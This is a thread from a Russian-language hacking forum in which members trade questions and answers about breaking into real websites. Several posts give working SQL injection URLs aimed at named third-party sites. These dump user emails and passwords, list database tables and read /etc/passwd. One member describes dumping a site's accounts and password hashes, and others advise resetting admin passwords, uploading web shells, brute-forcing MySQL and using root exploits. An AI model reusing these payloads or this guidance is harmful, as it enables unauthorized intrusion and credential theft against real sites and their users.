Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.meraevents.com/Service_provider_detail.php?spid=(1409)and(1=0)union(select(1),2,(select(@x)from(select(@x:=0x00),(select(0)from(user)where(0x00)in(@x:=concat(@x,0x3c62723e,Email,0x3a,Password))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)--+
     
    _________________________
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    http://www.horolive.com/member-profile.php
    как такое раскрутить?)
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Только на карусели такое раскручивается =\

    А где ты тут уязвимость увидели? Ты дал просто путь к скрипту и что дальше?
     
  4. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.name not like '%test%' ORDER BY a.subscription_date ASC' at line 1
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Эм...
    Ошибка в самом запросе локально, в ней никаких передаваемых параметров удаленно. Как ты представляешь, такое можно проэкспуатировать?
    Ну просто логически подумав можно же понять, что никак.
    Поимев сорцы можно посмотреть что и как там происходит и возможно получить полноценный SQLi, но так это скорее всего просто локальная ошибка независимая от внешних параметров.
    Вот если бы ошибка SQL вылезала при манипуляции с хидерами (Referer, User-Agent) или же GET \ POST \ COOKIE параметрами то да, это была бы скорее всего SQLi, а так... =\
     
    #16865 Tigger, 30 May 2011
    Last edited: 30 May 2011
    1 person likes this.
  6. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19

    Code:
    http://www.horolive.com/psychic-profile.php?id=-3254+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8+from+user--+
     
    1 person likes this.
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    есть хост справами роот, через пхп админ могу заливать файлы, но почемуто при заходе на сам файл, он не отоброжается в браузере, а через load_file('') говорит что он есть
    сервак стоит на винде...
     
    _________________________
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    база и сам сайт на разных хостах, посмотри @@version_compile_os
     
    _________________________
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    @@version_compile_os=Win32
    @@version=5.0.18-nt

    есть точный путь до корневого католога сайта, .htaccess не мешает, пхп выполняется, а мой не хочет, даже элементарный phpinfo();
     
    _________________________
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    знач мускул на винде, там какой сервак, апач/iis или что?
    если апач то попробуй узнать ос по баннерам

    вобщем если ты рут и есть PMA, то ищи там в базах всякие cms ки или форумы, меняй пасс админа, или добавь нового, и залей шелл

    быстрый и эффективный метод
     
    _________________________
    #16870 Konqi, 30 May 2011
    Last edited: 30 May 2011
  11. kartes1984

    kartes1984 New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x616d656c69615f74657374 +--+
    НЕ получается вывести таблицы имя базы amelia_test :(
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    В ней нет нечего

    http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,count(*),7,8,9,10+from+information_schema.tables+where+table_schema=0x616d656c69615f74657374+--+

    0
     
  13. kartes1984

    kartes1984 New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+-+
    opi8-база
    omokage@localhos-пользователь
    Как проверить есть ли у пользователя файловые привелегии?
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вернул ноль:
    Code:
    http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10--+
     
    _________________________
  15. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    на нужном сайте нашёл фтп доступ
    шарясь по папкам и файлам конфига не нащёл.
    шелл через браузер не залить
    вот такой вопрос
    а можно подключиться к этому же фтп через тотал команд или любой другой фтп софт
    фтп вероятна без пароля? коль позволяет заходить через браузер и осматриваться
    не в том направлении мыслю?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Koren

    зайти можно юзая любой фтп клиент, например filezilla
    но это аккаунт анонимус, врятли будут права для заливки файлов
    если серв на *Nix-e, то смотри в сторону рут сплоитов под данную фтпшку
     
    _________________________
  17. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    Code:
    Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
    « Error »
    Etomite encountered the following error while attempting to parse the requested resource:
    « PHP Parse Error »
     
    PHP error debug
      Error: 	Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)	 
      Error type/ Nr.: 	Warning - 2	 
      File: 	/home/infosno/public_html/index.php	 
      Line: 	394	 
      Line 394 source: 	header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']); 	 
     
    Parser timing
      MySQL: 	0.0000 s s	(0 Requests)
      PHP: 	0.6546 s s	 
      Total: 	0.6546 s s
    Можно использовать эту ошибку как уязвимость? если да то можно пример...
     
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Сайт вам сообщает, что не может вывести заголовки, поскольку они уже были выведены. Конечно там может что то есть, но из этой ошибки можно получить только раскрытие путей. Если переменные, преступаемые в header не фильтруются, то вполне возможно получить XSS.
     
    #16878 randman, 31 May 2011
    Last edited: 31 May 2011
    3 people like this.
  19. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Анализировал сайт через Webcruiser тот обнаружил пару уязвимостей,провел sql атаку и тут выдало всю Бд и Информацию о сервере,слил все аккаунты и хеши с паролями. Мне нужно повысить права доступа на своем аккаунте на том сайте,можно ли как нибуть редактировать БД? Mysql-5
    Выглядит уязвимость так
    Code:
    _http://wow-hummer.com/account/index.php?modul=static&id=5
    Кейворд: Игрового
     
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права

    З.Ы. какой вопрос такой ответ
     
    1 person likes this.
Thread Status:
Not open for further replies.